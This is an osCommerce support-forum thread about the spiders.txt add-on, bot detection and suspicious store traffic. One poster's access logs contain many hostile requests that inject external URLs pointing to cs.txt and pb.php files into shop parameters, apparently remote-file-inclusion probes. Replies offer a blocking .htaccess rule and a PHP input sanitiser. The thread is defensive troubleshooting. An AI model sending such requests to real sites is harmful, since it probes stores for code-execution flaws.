stevel

Updated spiders.txt Official Support Topic


Not really. I just figure it's a lot more data to read and loop through on every page access.

Thanks for the reply. I also have a question about bot names. The readme says: "For example, "ebot" matches Googlebot, "nbot" matches msnbot." Does this mean that search engines (SEs) now commonly understand these shortened names when they spider a site?


No. The purpose of spiders.txt is for your osCommerce store to recognize when a spider is visiting so that it won't be assigned a session. There is no need to identify which particular spider is visiting, and no attempt is made to. For example, lots of spiders have the string "crawl" in their user agent (it may show up as "Crawler", etc.), and the string "crawl" matches all of them. Similarly, a number of spiders, including Googlebot, have the string "ebot", and non-spider visitors never (we hope) do. Therefore, any user agent string containing "ebot" as a substring is deemed a spider.

Search engines never look at this file, nor do they care about it. The only things that matter are that a spider is identified as a spider and that a non-spider isn't incorrectly deemed one. The use of substrings is simply an attempt at optimizing the detection: fewer, shorter entries mean less to loop through on every page access.
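A minimal PHP sketch of the substring test described above, assuming the entries are read one per line from spiders.txt and compared case-insensitively with the visitor's user agent. The function name is_spider() and the sample entries are illustrative only, not the osCommerce source.

```php
<?php
// Hypothetical helper: returns true if any spiders.txt entry occurs
// anywhere inside the visitor's user agent string.
function is_spider(string $user_agent, array $patterns): bool
{
    // Compare case-insensitively, so "crawl" also matches "Crawler".
    $ua = strtolower($user_agent);
    if ($ua === '') {
        return false;
    }
    foreach ($patterns as $pattern) {
        // Lines read with file() keep their trailing newline, so trim first.
        $pattern = strtolower(trim($pattern));
        // Skip blank lines: on PHP 8 an empty needle would match every visitor.
        if ($pattern === '') {
            continue;
        }
        if (strpos($ua, $pattern) !== false) {
            return true; // one hit is enough; which spider it is doesn't matter
        }
    }
    return false;
}

// In a store the entries would be loaded from the file itself,
// e.g. $patterns = file('/path/to/spiders.txt');
$patterns = ["crawl\n", "ebot\n", "nbot\n", "heritrix\n"];
var_dump(is_spider('Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', $patterns));
var_dump(is_spider('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', $patterns));
```

Because one hit is enough, a short entry such as "ebot" covers many spider names at once, which keeps both the list and the loop short.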


I was confused by the "substring" term when I came across your contribution for the first time, Steve. Thanks for clarifying!


Hello,

For a while now, I've had visitors from one IP address range viewing just one page at a time on my site and adding random products to the cart. The last octet of the IP address differs every time.

82.99.30.48 - - [04/Nov/2007:13:54:56 -0700] "GET /index.php?cName=accessories&osCsid=0e9cbf6e9135aebf9cefa420dfc61d1a HTTP/1.0" 200 39690 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

82.99.30.73 - - [04/Nov/2007:14:03:28 -0700] "GET /featured_products.php?osCsid=0e9cbf6e9135aebf9cefa420dfc61d1a HTTP/1.0" 200 46332 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

82.99.30.49 - - [04/Nov/2007:14:21:26 -0700] "GET /product_reviews.php?pName=adapt&products_id=317&language=en&osCsid=4bdff8b680aa49b36c5b88b40e7b1e2d HTTP/1.0" 200 36282 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

82.99.30.22 - - [04/Nov/2007:14:29:51 -0700] "GET /my_points_help.php?language=de HTTP/1.0" 200 45147 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

82.99.30.68 - - [04/Nov/2007:14:38:44 -0700] "GET /gv_faq.php?language=de HTTP/1.0" 200 34604 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

82.99.30.11 - - [04/Nov/2007:15:06:48 -0700] "GET /product_info.php?pName=adapt&osCsid=2fb4d1873b22d2bfd890af3d35bf0b54 HTTP/1.0" 200 42446 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

82.99.30.67 - - [04/Nov/2007:15:14:03 -0700] "GET /product_info.php?language=de&pName=control&cName=control&osCsid=2fb4d1873b22d2bfd890af3d35bf0b54 HTTP/1.0" 200 51933 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

82.99.30.4 - - [04/Nov/2007:16:01:19 -0700] "GET /index.php?sort=4a&page=1&cName=modules&osCsid=2fb4d1873b22d2bfd890af3d35bf0b54 HTTP/1.0" 200 42756 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

82.99.30.21 - - [04/Nov/2007:16:32:21 -0700] "GET /product_info.php?pName=kit-20&cName=kits&osCsid=ba8f7b14c77e6d9df1c521d15400e98b HTTP/1.0" 200 45094 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

etc...

What can I do about it?

Thanks.


I'm having the same problem, but with a wide range of addresses: almost 40-50 different visitors with strange IP addresses. This started happening after I replaced my old spiders.txt file with the new one. Take a look at this.

Need help.

00:08:30 0 Guest 99.228.214.14 03:02:48 03:02:48 /

00:08:29 0 Guest 24.71.223.148 03:02:49 03:02:49 /shopping_cart.php

00:08:21 0 Guest 24.71.223.148 03:02:57 03:02:57 /satellite-accessories-c-51.html

00:07:58 0 Guest 24.71.223.148 03:03:20 03:03:20 /satellite-accessories-satellite-finders-c-51_56.html

00:07:42 0 Guest 24.71.223.148 03:03:36 03:03:36 /font-color0000ffabout-c-59.html

00:07:30 0 Guest 99.228.214.14 03:03:48 03:03:48 /captiveworks-receivers-c-41.html

00:18:09 0 Guest 71.245.29.105 02:53:09 02:56:40 /satellite-accessories-satellite-motors-c-51_57.html

00:02:43 0 Guest 24.71.223.148 03:08:35 03:08:35 /shopping_cart.php

00:02:42 0 Guest 38.113.177.227 03:08:36 03:08:36 /other-electronics-electronics-c-38_37.html

00:00:08 0 Guest 76.64.204.111 03:11:10 03:11:10 /

00:00:38 0 Guest 216.197.133.146 03:10:40 03:10:40 /

00:11:05 0 Guest 142.177.229.37 03:00:13 03:00:13 /

00:10:49 0 Guest 24.71.223.148 03:00:29 03:00:29 /satellite-dishes-c-52.html

00:10:10 0 Guest 24.71.223.148 03:01:08 03:01:08 /captiveworks-receivers-c-41.html

00:09:54 0 Guest 24.71.223.148 03:01:24 03:01:24 /shopping_cart.php?sort=2a

00:09:34 0 Guest 24.71.223.148 03:01:44 03:01:44 /shopping_cart.php

00:09:26 0 Guest 24.71.223.148 03:01:52 03:01:52 /captiveworks-receivers-c-41.html

00:07:00 0 Guest 24.71.223.148 03:04:18 03:04:18 /create_account.php

00:02:01 0 Guest 24.71.223.148 03:09:17 03:09:17 /shopping_cart.php?sort=2a

00:02:17 0 Guest 24.71.223.148 03:09:01 03:09:01 /satellite-dishes-c-52.html

00:05:30 0 Guest 99.228.214.14 03:05:48 03:05:48 /captiveworks-receivers-c-41.html

00:09:06 0 Guest 24.71.223.148 03:02:12 03:02:12 /index.php

00:05:43 0 Guest 67.158.176.139 03:05:35 03:05:35 /

00:55:07 0 Guest 66.249.67.131 02:16:11 02:58:48 /advanced_search_result.php?keywords=digital+cameras&osCsid=7a3e

00:03:00 0 Guest 24.71.223.148 03:08:18 03:08:18 /index.php

00:03:25 0 Guest 24.71.223.148 03:07:53 03:07:53 /create_account.php

00:08:34 0 Guest 65.92.100.150 03:02:44 03:02:44 /

00:03:21 0 Guest 24.71.223.148 03:07:57 03:07:57 /create_account_success.php

00:08:51 0 Guest 24.71.223.148 03:02:27 03:02:27 /products_new.php

00:09:15 0 Guest 24.71.223.148 03:02:03 03:02:03 /shopping_cart.php?sort=2a

00:06:41 0 Guest 99.228.214.14 03:04:37 03:04:37 /captiveworks-receivers-c-41.html

00:14:13 0 Guest 142.177.229.37 02:57:05 02:57:05 /pansat-receivers-c-49.html

00:13:58 0 Guest 142.177.229.37 02:57:20 02:58:45 /advanced_search_result.php?keywords=digital+cameras&osCsid=7a3e

00:04:47 0 Guest 99.228.214.14 03:06:31 03:06:31 /captain-receivers-c-43.html

00:01:39 0 Guest 24.71.223.148 03:09:39 03:09:39 /login.php

00:01:54 0 Guest 38.113.177.227 03:09:24 03:09:24 /captiveworks-cw800s-receiver-p-174.html

00:16:06 0 Guest 142.177.229.37 02:55:12 03:00:07 /index.php?currency=USD&osCsid=8e5b46b96e49fd026113e76b774d8e0f

00:12:15 0 Guest 24.71.223.148 02:59:03 02:59:03 /

00:11:53 0 Guest 65.92.100.150 02:59:25 02:59:25 /

00:11:24 0 Guest 142.177.229.37 02:59:54 02:59:54 /other-electronics-cameras-c-38_28.html

00:11:15 0 Guest 142.177.229.37 03:00:03 03:00:03 /pansat-receivers-c-49.html

00:04:13 0 Guest 24.71.223.148 03:07:05 03:07:05 /create_account.php

00:02:09 0 Guest 38.113.177.227 03:09:09 03:09:09 /

00:10:23 0 Guest 24.71.223.148 03:00:55 03:00:55 /shopping_cart.php?sort=2a

Currently there are 44 customers online

Please help. This has been happening for the last 72 hours. Every time I check Who's Online, I see this with different numbers.


Hi there, I've just added the updated spiders-large.txt and renamed it to spiders.txt as instructed, but I'm still getting the bots shown in the image below. Any advice? I'm new to all this, so if you could explain it to me that would be great.

(attached image: bots.jpg)

Thank You

Regards

Ian :thumbsup:


Looks as if my subscription to this topic expired again - sigh...

Ian,

The purpose of spiders.txt is NOT to prevent bots from spidering your site. Rather, it is to ensure that said bots don't get sessions, so that session IDs don't end up in the links they index and so that they stay out of functions that require a session (such as Add to Cart).

Irina,

The entries you show come from (or are pretending to come from) a user's browser. I agree that it looks suspicious, but there's nothing spiders.txt can do for you, since the user agent string is that of a normal browser. What you can do is add a "Deny from" entry to your .htaccess file to block access from this IP range (82.99.30).
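To see which addresses a partial range like 82.99.30 covers, here is a hedged PHP sketch. It assumes Apache's partial-address convention (the first one to three octets, matched octet by octet); ip_in_partial_range() is a hypothetical helper, not part of osCommerce or Apache.

```php
<?php
// Hypothetical helper: does $ip fall inside a partial IPv4 range such as
// "82.99.30" (i.e. 82.99.30.0 through 82.99.30.255)?
function ip_in_partial_range(string $ip, string $partial): bool
{
    // Compare whole octets: append a dot so that "82.99.3" does not
    // accidentally match "82.99.30.48".
    $prefix = rtrim($partial, '.') . '.';
    return strncmp($ip, $prefix, strlen($prefix)) === 0;
}

// The first two addresses appear in the log excerpt; the third is made up.
foreach (['82.99.30.48', '82.99.30.4', '82.99.31.7'] as $ip) {
    echo $ip, ' => ', ip_in_partial_range($ip, '82.99.30') ? 'blocked' : 'allowed', PHP_EOL;
}
```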

 

irfan (beaman),

We would need to see the access log entries; a "Who's Online" report is not sufficient. I'll note that many of these look like normal users (cable modem customers, etc.).
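For anyone unsure which lines to post: each line of an Apache "combined" access log already carries the IP, the request and the user agent, and the user agent is what spiders.txt is matched against. A hedged PHP sketch that pulls those fields out, assuming the standard combined layout seen in the log excerpts in this thread; parse_access_log_line() is a hypothetical name.

```php
<?php
// Hypothetical helper: split one line of an Apache "combined" log into
// its fields. Returns null if the line does not look like that format.
// Note: user agents containing escaped quotes (\") are not handled.
function parse_access_log_line(string $line): ?array
{
    $pattern = '/^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+) "([^"]*)" "([^"]*)"/';
    if (!preg_match($pattern, $line, $m)) {
        return null;
    }
    return [
        'ip'         => $m[1],
        'time'       => $m[2],
        'request'    => $m[3],
        'status'     => (int) $m[4],
        'bytes'      => $m[5], // "-" when no body was sent
        'referer'    => $m[6],
        'user_agent' => $m[7],
    ];
}

$line = '82.99.30.48 - - [04/Nov/2007:13:54:56 -0700] "GET /index.php?cName=accessories&osCsid=0e9cbf6e9135aebf9cefa420dfc61d1a HTTP/1.0" 200 39690 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"';
$entry = parse_access_log_line($line);
echo $entry['ip'], ' | ', $entry['status'], ' | ', $entry['user_agent'], PHP_EOL;
```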


I seem to be having an issue with "amazonaws". Is this a new spider? I have the most up-to-date spiders file.

Thanks

Evan


It doesn't seem to be a regular spider. It could be someone writing code that runs on Amazon Web Services. I will check my logs to see if I have hits from it, but a check of yesterday's log doesn't show anything.

What are you seeing - spider-like activity over many links? Please provide some sample lines from the web access log.


I am about to block the IP address, but I really don't want to.

I'm not sure how to provide the web access log, but here is a sample of what I think you want:

/-p-100.html?language=es
Http Code: 200 Date: Jan 08 12:39:59 Http Version: HTTP/1.0 Size in Bytes: 15209
Referer: http://www.ganodermacoffee.com/product_inf...products_id=100
Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:paul@page-store.com]

/-p-99.html?language=es
Http Code: 200 Date: Jan 08 12:40:12 Http Version: HTTP/1.0 Size in Bytes: 15201
Referer: http://www.ganodermacoffee.com/-p-99.html
Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:paul@page-store.com]

/-p-99.html?language=en
Http Code: 200 Date: Jan 08 12:40:22 Http Version: HTTP/1.0 Size in Bytes: 15790
Referer: http://www.ganodermacoffee.com/-p-99.html
Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:paul@page-store.com]

/-pr-99.html
Http Code: 200 Date: Jan 08 12:40:33 Http Version: HTTP/1.0 Size in Bytes: 13829
Referer: http://www.ganodermacoffee.com/-p-99.html
Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:paul@page-store.com]

/-p-102.html?language=es
Http Code: 200 Date: Jan 08 12:40:47 Http Version: HTTP/1.0 Size in Bytes: 15215
Referer: http://www.ganodermacoffee.com/product_inf...products_id=102
Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:paul@page-store.com]

/-p-102.html?language=en
Http Code: 200 Date: Jan 08 12:41:05 Http Version: HTTP/1.0 Size in Bytes: 15843
Referer: http://www.ganodermacoffee.com/product_inf...products_id=102
Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:paul@page-store.com]

-----------------------

01:39:40 Guest ec2-72-44-49-100.z-1.compute-1.amazonaws.com 11:10:13 12:49:53 Gano Coffee Club (Product) Yes Yes

Name: Guest
ID: 0
IP Address: 72.44.49.100
User Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:paul@page-store.com]
osCsid: 49a31cd29bce4cd3e1e32bc4ff5462e6

------------------

It seems to keep cycling through the products, adding one of each to the cart, and now it has started adding a second item to the cart for each product.

Referer?: http://www.ganodermacoffee.com/


Ah. This should be caught by the "heritrix" entry in spiders.txt. Perhaps your store is not configured to use it?

I would feel better if I saw entries from an actual access log.

Edited by stevel


Hi Steve,

I got many hits today from "spider5.mail.ru", IP 195.239.211.234.

Browser-Identification: "Mail.Ru/1.0"

Do you already have this little fellow in your files?

Regards

Andreas

Edited by Andreas2003


I've noticed some suspicious activity on my web site. It's either a spider or a script running continuously. It visits my web site throughout the day, makes one click at a time, and always uses a different IP, so it's hard to block. Here is what I have in my access_log:

67.68.206.67 - - [30/Jan/2008:05:33:36 -0700] "GET /product_info.php?pName=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 72027 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

67.68.206.67 - - [30/Jan/2008:05:34:07 -0700] "GET /index.php?sort=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 48317 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

70.53.156.125 - - [30/Jan/2008:05:41:44 -0700] "GET /product_info.php?pName=http://laudanskisucksss.chat.ru/placeholder/image? HTTP/1.1" 200 72141 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

70.53.156.125 - - [30/Jan/2008:05:41:52 -0700] "GET /product_info.php?pName=http://laudanskisucksss.chat.ru/placeholder/image? HTTP/1.1" 200 72170 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

70.53.156.125 - - [30/Jan/2008:05:42:34 -0700] "GET /index.php?sort=http://laudanskisucksss.chat.ru/placeholder/image? HTTP/1.1" 200 48422 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

70.53.156.125 - - [30/Jan/2008:05:42:34 -0700] "GET /index.php?sort=http://laudanskisucksss.chat.ru/placeholder/image? HTTP/1.1" 200 48471 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

124.104.84.192 - - [30/Jan/2008:05:43:32 -0700] "GET /product_info.php?language=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 67772 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"

124.104.84.192 - - [30/Jan/2008:05:43:45 -0700] "GET /product_info.php?pName=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 66375 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"

64.231.108.203 - - [30/Jan/2008:05:51:28 -0700] "GET /product_info.php?pName=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 71998 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

64.231.108.203 - - [30/Jan/2008:05:51:30 -0700] "GET /product_info.php?pName=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 72027 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

64.231.108.203 - - [30/Jan/2008:05:51:30 -0700] "GET /product_info.php?pName=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 71998 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

64.231.108.203 - - [30/Jan/2008:05:51:32 -0700] "GET /product_info.php?pName=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 12945 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

64.231.108.203 - - [30/Jan/2008:05:52:13 -0700] "GET /index.php?sort=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 48219 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

64.231.108.203 - - [30/Jan/2008:05:52:13 -0700] "GET /index.php?sort=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 48256 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

64.231.108.203 - - [30/Jan/2008:05:52:15 -0700] "GET /index.php?sort=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 48399 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

64.231.108.203 - - [30/Jan/2008:05:52:21 -0700] "GET /index.php?sort=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 12945 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

69.159.62.217 - - [30/Jan/2008:06:20:32 -0700] "GET /index.php?sort=http://cherrygirl.h18.ru/images/cs.txt? HTTP/1.1" 200 48296 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; pt-BR; rv:1.7.7) Gecko/20050414 Firefox/2.0.5"

124.104.84.192 - - [30/Jan/2008:06:37:02 -0700] "GET /product_info.php?language=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 67776 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"

124.104.84.192 - - [30/Jan/2008:06:37:17 -0700] "GET /product_info.php?pName=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 66337 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"

67.68.206.67 - - [30/Jan/2008:07:15:23 -0700] "GET /product_info.php?pName=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 72027 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

and so on...

Can anybody please explain what's going on, and whether there is something I can do about it? Any help will be appreciated. Thanks.

Edited by Irin


It's looking to see if it can use your site for redirecting URLs in spam emails.

If you are not using the "Visit this product's web site" feature, you can do the following. Add this code to your .htaccess file:

RewriteEngine On

RewriteCond %{QUERY_STRING} :/ [NC]
RewriteRule ^ - [F]

If you already have the RewriteEngine line in there, don't repeat it.

This will cause all attempts to access your site with a URL in the parameters to fail.
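The same test can be sketched in PHP, for example to check which requests the rule would refuse. This assumes, as in the RewriteCond above, that the raw query string is searched for the two characters ":/"; query_contains_url() is a hypothetical name, and the .htaccess rule remains the simpler option.

```php
<?php
// Hypothetical helper mirroring `RewriteCond %{QUERY_STRING} :/`:
// true when the raw (still percent-encoded) query string contains ":/".
function query_contains_url(string $query_string): bool
{
    return strpos($query_string, ':/') !== false;
}

// Possible use near the top of a page, before any output is sent:
// if (query_contains_url($_SERVER['QUERY_STRING'] ?? '')) {
//     http_response_code(403); // same "Forbidden" status as [F]
//     exit;
// }

var_dump(query_contains_url('sort=http://hotraebywka.chat.ru/images/girl?'));
var_dump(query_contains_url('cName=accessories&osCsid=0e9cbf6e9135aebf9cefa420dfc61d1a'));
```

Because this looks at the raw query string, a percent-encoded value such as http%3A%2F%2F... contains no ":/" and passes the check.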


Hi Stevel,

Is this the feature on product_info.php "For more information, please visit this products webpage."? If so, I do use it. I've added your code to my .htaccess file. Do you think it will prevent the script from running?

Thanks for your help.


Yes, that's the feature. You'll probably find that those links stop working. It can be worked around by changing the URL used so that it does not include the "http://" part.


Stevel,

Thanks a lot for your help. Since I added your code to my .htaccess file, I don't see any more strange URLs accessing my web site; it has stopped all attempts to use my web site for suspicious purposes. The redirect feature also seems to be working fine: the URL used to redirect to the web page is http://myshop.com/redirect.php?action=url&...cts%2Fpage.html. Thanks to you, I got this problem sorted.

Thanks again.


You're welcome. You should see "403" (Forbidden) errors show up in the log, but you'll see a lot fewer of those over time. You can rest assured that this closes off one possible way for spammers to abuse your site.


Yep, I can see some "403" errors in my log, but they are all for these strange URLs:

70.51.76.179 - - [30/Jan/2008:12:42:17 -0700] "GET /index.php?sort=http://ninaru.hut2.ru/images/cs.txt? HTTP/1.1" 403 307 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"

76.67.138.251 - - [30/Jan/2008:12:37:56 -0700] "GET /index.php?sort=http://0xg3458.hub.io/pb.php? HTTP/1.1" 403 307 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"

76.67.138.251 - - [30/Jan/2008:12:37:05 -0700] "GET /product_info.php?pName=http://0xg3458.hub.io/pb.php? HTTP/1.1" 403 314 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"

64.229.149.191 - - [30/Jan/2008:12:33:45 -0700] "GET /index.php?sort=http://migirlinme.krovatka.su/index? HTTP/1.1" 403 307 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

Some other URLs are also showing up in my log file; maybe you know what they are:

196.217.86.107 - - [30/Jan/2008:12:53:45 -0700] "GET /osCommerce/images/prod.jpg HTTP/1.1" 301 366 "http://all-patch.org/vb/showthread.php?p=764145#post764145" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iOpus-I-M; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MEGAUPLOAD 2.0)"

212.76.72.252 - - [30/Jan/2008:12:54:23 -0700] "GET /osCommerce/images/prod.jpg HTTP/1.1" 301 366 "http://www.bramjnet.com/vb3/showthread.php?t=99710" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SIMBAR={7B7C664E-CCE9-11DC-A053-000FB0E14566}; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727)"

212.76.72.252 - - [30/Jan/2008:12:54:24 -0700] "GET /images/prod.jpg HTTP/1.1" 200 9061 "http://www.bramjnet.com/vb3/showthread.php?t=99710" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SIMBAR={7B7C664E-CCE9-11DC-A053-000FB0E14566}; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727)"

Again, thanks for your help.

Edited by Irin


Using .htaccess really (IMO) ought to be a last, dirty resort in these cases. After all, we are talking about simply sanitising the $_GET variable. (Maybe you build $_REQUEST = $_GET + $_POST (after sanitising, of course) like me... who needs $_COOKIE, for god's sake?)

$_GET is often multidimensional, so why not use a recursive cleaner, something like:

$_GET = clean_get__recursive($_GET);

function clean_get__recursive($get_var)
{
    // Nested arrays (e.g. ?foo[]=a&foo[]=b): clean each element recursively.
    if (is_array($get_var)) {
        return array_map('clean_get__recursive', $get_var);
    }
    // Scalars: keep only letters, digits, space, underscore, dot and hyphen.
    return preg_replace('/[^a-zA-Z0-9 _.-]/', '', (string) $get_var);
}

The preg_replace may be too heavy for some, but the concept is sound.

Edited by Babygurgles


Robert, that's an interesting idea, but it doesn't signal to the spammers that they should go away. There's no legitimate purpose to having :/ in a $_GET parameter, so the .htaccess rule takes care of it simply.


Perhaps a nice little error page saying #!@#! off! :D

Anyway... I'm leading this thread off topic. Back to spiders.txt, I think.

Edited by Babygurgles


GAH! Livebot BEGONE!

I'm having hassles with livebot (livebot-65-55-165-14.search.live.com and others) impersonating real customers by using this user agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322). This bot annoys me because it creates sessions (thereby putting osCommerce session IDs in its index), adds things to the cart (making me excited that someone's about to buy something, then disappointing me when I realise what's going on) and doesn't play nice with spiders.txt.

Any idea how I can prevent this bot from creating sessions?

Cheers,

Max


If it uses the same IP every time, just ban that IP from your site. I believe there is an add-on for that, or you can use .htaccess (see http://tools.dynamicdrive.com/userban/). IP bans are not a 100% remedy, though, and can easily ban a potential customer if you're not careful.
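Because this bot sends a browser-like user agent, spiders.txt cannot recognize it. One alternative, sketched here under assumptions, is to look at the reverse-DNS hostname instead, since the post above shows names ending in search.live.com. The function name and suffix list are hypothetical; a reverse lookup on every page access adds latency, and the hostname can be faked unless it is confirmed with a forward lookup.

```php
<?php
// Hypothetical helper: true if $hostname ends with one of the given
// domain suffixes, e.g. "livebot-65-55-165-14.search.live.com".
function host_matches_suffix(string $hostname, array $suffixes): bool
{
    $host = strtolower(rtrim($hostname, '.'));
    foreach ($suffixes as $suffix) {
        $suffix = '.' . ltrim(strtolower($suffix), '.');
        // Require a dot boundary so "xsearch.live.com" is not treated
        // as part of search.live.com.
        if (substr($host, -strlen($suffix)) === $suffix) {
            return true;
        }
    }
    return false;
}

// In a store the hostname would come from a reverse lookup, e.g.
// $hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
// (gethostbyaddr() returns the unchanged IP address if the lookup fails.)
$hostname = 'livebot-65-55-165-14.search.live.com';
var_dump(host_matches_suffix($hostname, ['search.live.com']));
```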
